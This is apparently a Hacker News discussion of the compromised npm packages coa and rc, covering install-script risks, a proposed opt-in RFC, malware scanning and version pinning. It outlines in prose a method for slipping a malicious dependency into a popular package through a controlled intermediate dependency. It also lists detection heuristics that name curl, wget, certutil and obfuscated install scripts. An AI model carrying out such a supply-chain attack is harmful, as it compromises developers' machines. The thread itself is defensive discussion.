RFC: https://github.com/npm/rfcs/pull/488
Related HN post: https://news.ycombinator.com/item?id=29122473
1) The vast majority of packages on npm don't require install scripts to work.
2) Many of them that currently include install scripts are just ads asking people to contribute code or money to their project.
1. You add a totally "safe" dependency that you control, let's call it "shell-dependency", as an innocuous part of a PR to a "popular-package". Again, even if you inspect this package, it's totally fine. The current version of shell-dependency is 1.0.0, but it of course goes into the package.json as "1.x.x"
2. You now add malicious dependency to shell-dependency, and bump shell-dependency to 1.0.1, meaning every consumer of "popular-package" now gets your "malicious-package".
Notice that this was accomplished with zero traceable GitHub history. Unless every package up the line uses a package-lock.json (which is explicitly recommended against unless you are an end-user application), "malicious-package" is able to enter the dependency chain undetected. If it required some sort of code import, then it would have more opportunities to be spotted. There are of course ways to do this with attacks that require running code as well, but this makes it super easy, especially considering that people often install packages as root, even when they run their apps not as root.
Regardless, just because there are additional vectors to exploit the user doesn't mean closing off one vector isn't worth doing.
For example, if I installed a command line arguments parser and it claimed to require running a setup script, I would immediately be very suspicious.
For a huge package like TypeScript, I'd probably just immediately let the script run and trust Microsoft to not publish malware (and NPM to not change the package contents).
1. The people involved are developers using development components, who are much better equipped to understand an installation failure and take proper action than an end user who is just trying to click through to play a video game or something. But more importantly:
2. The vast majority of the installs happen on automated machines (like CI), where you definitely want to fail when something drastically different happens like a new package is all of a sudden running a script. The tests would fail, you would look at the reason, it would be because some weird script is about to run on the machine, and you'd adjust your PR accordingly. This allows multiple levels of consideration: 1) the original author deciding to do something about the failed install (even if it's just appending the flag and not thinking about it), and 2) the PR reviewer having code-as-data evidence that this code change would mean new foreign code not represented in the commits will be running on their machines. This is huge.
The other important point about this is that packages precisely have different risk models depending on whether you are installing things locally or on production machines, where a malicious package could be catastrophic. That's why the RFC allows you to have individual user configuration where you explicitly allow certain packages "from now on" (which is I think the way most people want to think about this: the first time you install something and it warns you and you look into it, but from then on you say "this one is good"). On the other hand, the actual scripts and repository have no such configuration and thus require the installation to include the specific flags, again, clearly documenting the expected results of a seemingly innocent process that can actually currently have bad consequences.
Note how the referenced Virustotal result has 40+ detections [1]. I'm still wondering why info like this isn't used by Pypi and NPM. Chocolatey has Virustotal integration for all releases.
And it's not like Virustotal is the only option, there is Cape [2] for dynamic execution, Metadefender, and Intezer Analyze just to name a few.
Really confusing for such a vital supply chain component to be this easily abused.
One of the highlights is when someone recently used NPM to spread ransomware via a fake Roblox API package.[3]
[1] https://www.virustotal.com/gui/file/26451f7f6fe297adf6738295...
[2] https://github.com/kevoreilly/CAPEv2
[3] https://www.reddit.com/r/programming/comments/qgz0em/fake_np...
I was contracted to help build a malware analysis pipeline for PyPI[1][2]. We don't currently have a VirusTotal detector/analyzer (IIRC, we couldn't get a high-enough volume API token on short order), but I think any work towards that would be greatly appreciated by both the PyPA members and the Python packaging community!
[1]: https://pyfound.blogspot.com/2018/12/upcoming-pypi-improveme...
[2]: https://github.com/pypa/warehouse/tree/main/warehouse/malwar...
We're consuming everything we can about a package to figure this out. We've built a static analysis system to reason about code (it's not perfect, but we're getting better and better). We process all the data we can get, then build analytics, heuristics and ML models to extract evidence. The evidence is then pieced together to identify software supply chain risk.
In this case there is a lot of signal to show both bad and suspicious things are happening.
1. Obfuscation: this creates a comparatively deep AST of the code, and isn't difficult to identify.
2. Command execution: curl, wget, LOLBINs like certutil are pretty easy to identify. This isn't a slam dunk every time you see it, but it adds evidence to a potentially malicious claim.
3. URLs: These are uncommon in libraries and add evidence.
4. Pre/Post install scripts: These are fairly commonly used for other things as well, but invoking node on a source file that is likely obfuscated is a good sign something suspicious is happening.
We're trying to build everything fast enough to make the target far less attractive for attackers before it gets a lot worse.
Honestly, I'm strongly considering moving away from the NPM ecosystem because it's clearly become a target for malware.
Here's FAR manager which for some reason has some hits on virustotal
https://github.com/vouch-dev/vouch
Vouch lets users create and share reviews for NPM packages. Project dependencies can then be checked against those reviews.
Vouch uses extensions to interface with package ecosystems. It's simple to create a new extension. Extensions currently exist for NPM, PyPi, and Ansible Galaxy.
I'm currently working on a website to index known reviews and publish official reviews.
I hope you guys find it useful! Drop by the Matrix channel if you have any feedback to share: #vouch:matrix.org
There are a couple more straightforward ways to do this:
1. Require 2FA, ideally hardware key 2FA, for anyone publishing a package with any sizable following.
2. Make running of preinstall/install scripts opt-in.
3. Make the semantic versioning syntax optionally more restrictive. If I specify I want version ^2.2.1, I'd like to be able to specify that I DON'T want to pull 2.2.2 the moment it becomes available, but perhaps want some amount of latency before pulling that.
But the review process does not need to re-start from scratch. Reviews from other versions can be used to lessen the workload.
On the subject of automatically updating packages: the Vouch dependency analysis can be included in CI. Un-reviewed or review failing dependency updates can be flagged for attention.
Is there an example of a generated report?
Why the fuck do all these leftpad is-even hello-world tic-tac-toe packages have millions of downloads?
20-30 LoC maybe. `process.argv.slice(2).forEach(str => ... )`.
there is no access to the raw command-line invocation, sadly, so you really can't really do anything fancier than that.
>config loading
that thing "RC" package does - looking up the config file in random locations - is really strange to me. aren't you the one in control of where it is stored?
And perhaps some faked download numbers to lend an air of authenticity.
NPM meanwhile is a neverending net of tiny oneliner packages, required by other oneliner packages, required by twoliner packages, required by single-function packages, required by... required by React. And thus, adding malware to `is-number` adds it to all 8766235452 packages that depend on it.
Part of the NPM issue is that everything gets atomized into tiny libraries and no one seems to care about the dependency explosion.
Edit: without looking at it beforehand
I know people keep saying about post-install should be opt out but then malware will just wait for first run instead.
How about an option to refuse to install any packages that have been published in the past week/2 weeks? That way hopefully malware like this would have been spotted before you end up running it locally.
Of course, if the attacker has access to their npm account, they can probably change the email address associated with the account too, so change-of-email requests should send a "Thank you for changing your email address" to the original address.
The developer might have difficulty regaining control of the account, but hopefully they could inform the npm security team who could quite quickly confirm that a malicious package had been uploaded, which would be enough to get the malicious package taken down and the account locked.
It links to the github repo, where the latest commit is from 2018 for version 1.2.8.
It links to npmjs page, that shows 48 versions, where the latest version is 1.2.8 from "3 years ago".
Yet it has 1.2.9/1.3.9/2.3.9 for "Affected versions".
Did npmjs "revert" these versions and any clue of their existence? The npmjs page links to dominictarr's repository. The npmjs site doesn't seem to have a "who owns this package name" besides the repository/homepage links. Very confusing.
I remember some years ago there was some story involving the original author's handing maintainership rights to some shady dude. Is it about that time, or is it about something more current?
I pointed this flaw out repeatedly in the Rust forums when there were discussions related to improvements that could be to crates.io. They made it very clear that "everyone understands" that crates themselves are the "source of truth", and that nobody should be doing security reviews by going to GitHub or wherever.
So what happens in reality?
Precisely what you just did. People instinctively click the source repo link, and browse around in the GitHub history view to "see what happened".
Sigh.
It's like trying to explain to someone that the cargo lift design of the Death Star is dangerous without handrails. Then someone points out that when you signed up to be a Stormtrooper on the Death Star there was a clause in the contract (page 537 paragraph 7) that clearly states that it is your responsibility to avoid fatal falls due to precipitous ledges.
That is, for sensitive apps, I don't want to use versions that are less than, say, a month or so old unless I specifically override it. I want to stay up-to-date but not too bleeding edge, specifically to avoid situations like this.
An attacker who had control over an account would wait until just such a moment to add their own version which includes a much worse payload, and people would rush to download it, thinking they were just installing a fix for the minor vulnerability.
What's nuts is that any of these projects (whether they be single components, larger utilities, or full-blown apps) require a build step that involves anything more complicated[1] than a single machine-readable document in the web browser's native file format and that sits alongside (or in place of[2]) the project README. With so many programmers writing code for the express purpose of making digital documents with behavior dynamic enough to trick you into thinking that the page you have open is really an app, no one in the community with any clout ever stops and says, "Gee, since we're at it, maybe we ought to take this tech that enables us to securely run code on demand and focus it on the goal of allowing other programmers to configure all these modules that we're sharing with one another, or to handle the finishing step of a collection of modules that make up a given app."
Then again, that would presume that any of the stuff that this industry engages in is actually meant to solve any problem, rather than creating a neverending supply of them in order to justify the paychecks being written and the egos they're feeding. If stuff's not laughably overengineered to the point of constantly breaking for no good reason[3], does it even count as "real"[4] programming?
1. https://www.colbyrussell.com/2019/03/06/how-to-displace-java...
2. https://news.ycombinator.com/item?id=28407936
> Since then, the npm security team has removed all the compromised coa and rc versions to prevent developers from accidentally infecting themselves.
Removing all trace of evidence is not something "security teams" should do. Instead of sweeping security incidents under the rug (where twitterverse resides), they should at least mention the existence of these versions and that they contain malware on the package page.
NPM package ‘ua-parser-JS’ with more than 7M weekly download is compromised - https://news.ycombinator.com/item?id=28962168 - Oct 2021 (141 comments)
I mean, a package.json with changing permissions and an alert or manual confirmation step could've easily fixed this.
NPM is pretty much the definition of a security nightmare, because you cannot guarantee anything.
Any dependency down the tree can compromise anything upstream.
I think that package managers must offer build bots that use the source codes (git repositories) as sources of truth rather than their own packages. That's the only way that comes to mind to guarantee that the publisher of the package is actually the same owner.
If a git repo changes, warn all users. If a permission changes, warn all users. If a header/symbol file changes, warn all users.
npm install foo@3.1.7
And it, by default, inserts "foo@^3.1.7" which means "anything 3.1.7 or higher but not "4.x.x".In other words, the next time someone installs the dependencies it could be 3.1.8, 3.9.7, 3.1234.999 etc...
But maybe it should default to just the actual version and all upgrades should be required to be manual. Checking my HD I see I have lots of references to "rc@^1.1.6", "rc@^1.2.8" etc, all of which would install 1.2.9 if reinstall the deps
"version": "1.2.8",
Pfew, really lucky. Going to nuke npm now.